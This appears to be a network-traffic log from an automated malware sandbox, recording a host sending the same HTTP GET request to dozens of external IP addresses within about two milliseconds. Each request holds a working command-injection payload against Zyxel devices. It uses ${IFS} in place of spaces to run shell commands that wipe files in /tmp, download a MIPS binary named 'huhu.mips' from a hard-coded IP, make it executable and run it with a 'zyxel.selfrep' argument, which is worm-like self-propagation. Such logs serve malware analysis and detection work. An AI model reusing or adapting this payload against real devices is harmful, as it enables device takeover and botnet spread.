                                            Feb 2, 2024 06:21:20.792021990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6356192.168.2.1559840172.39.172.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792035103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6357192.168.2.154014440.172.143.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792079926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6358192.168.2.155400284.113.11.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792112112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6359192.168.2.1535092191.216.188.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792169094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6360192.168.2.1556994148.147.32.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792200089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6361192.168.2.1554094136.64.214.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792257071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6362192.168.2.153785485.185.29.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792293072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6363192.168.2.154468014.17.188.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792340994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6364192.168.2.1534190120.120.128.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792372942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6365192.168.2.1555822121.213.87.68443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792413950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6366192.168.2.1543196195.249.247.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792435884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6367192.168.2.155680842.143.199.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792475939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6368192.168.2.154703481.177.59.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792524099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6369192.168.2.1559366177.113.243.21443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792561054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6370192.168.2.1543352189.10.18.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792608976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6371192.168.2.1544678174.128.212.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792635918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6372192.168.2.154432237.104.29.78443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792696953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6373192.168.2.1549558199.180.234.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792721987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6374192.168.2.1536316115.29.144.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792778015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6375192.168.2.1544538186.125.222.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792809963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6376192.168.2.154715690.211.166.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792844057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6377192.168.2.1557136199.180.33.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792867899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6378192.168.2.1534558194.244.215.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792898893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6379192.168.2.1547674221.57.137.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792946100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6380192.168.2.154718898.48.198.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.792994022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6381192.168.2.1557652134.219.224.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793051958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6382192.168.2.1542778175.92.60.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793092012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6383192.168.2.154368687.151.242.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793121099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6384192.168.2.153774468.95.64.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793174028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6385192.168.2.153450853.246.108.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793210030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6386192.168.2.1549778188.103.97.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793246031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6387192.168.2.155689237.147.58.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793302059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6388192.168.2.1548056108.202.228.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793345928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6389192.168.2.15559381.48.188.74443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793356895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6390192.168.2.155563063.123.52.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793409109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6391192.168.2.153700875.108.116.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793447971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6392192.168.2.1550136183.102.188.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793478966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6393192.168.2.1538122167.200.140.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793541908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6394192.168.2.1555192194.235.252.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793584108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6395192.168.2.155370863.108.134.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793601990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6396192.168.2.155219032.180.77.221443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793644905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6397192.168.2.155233450.91.82.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793684959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6398192.168.2.153448637.115.101.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793705940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6399192.168.2.1536796106.226.188.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793740034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6400192.168.2.1556414218.47.113.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793795109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6401192.168.2.1545866204.254.172.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793807983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6402192.168.2.1537040198.95.53.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793860912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6403192.168.2.155916243.241.65.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793891907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6404192.168.2.1535200207.159.99.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793939114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6405192.168.2.1539542146.234.90.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.793987036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6406192.168.2.1559812211.88.92.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794023991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6407192.168.2.1549116139.250.157.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794079065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6408192.168.2.1555558141.140.237.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794112921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6409192.168.2.1542202142.212.187.95443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794153929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6410192.168.2.153366481.123.196.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794182062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6411192.168.2.1534320169.184.66.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794214010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6412192.168.2.154191258.105.72.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794251919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6413192.168.2.1550100216.20.196.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794287920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6414192.168.2.1548996126.167.129.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794311047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6415192.168.2.1557972124.73.205.243443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794370890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6416192.168.2.1546118208.143.111.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794409990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6417192.168.2.155802294.166.92.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794460058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6418192.168.2.1533218193.161.231.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:20.794506073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            6419192.168.2.1551088132.221.241.158443
                                            TimestampBytes transferredDirectionData
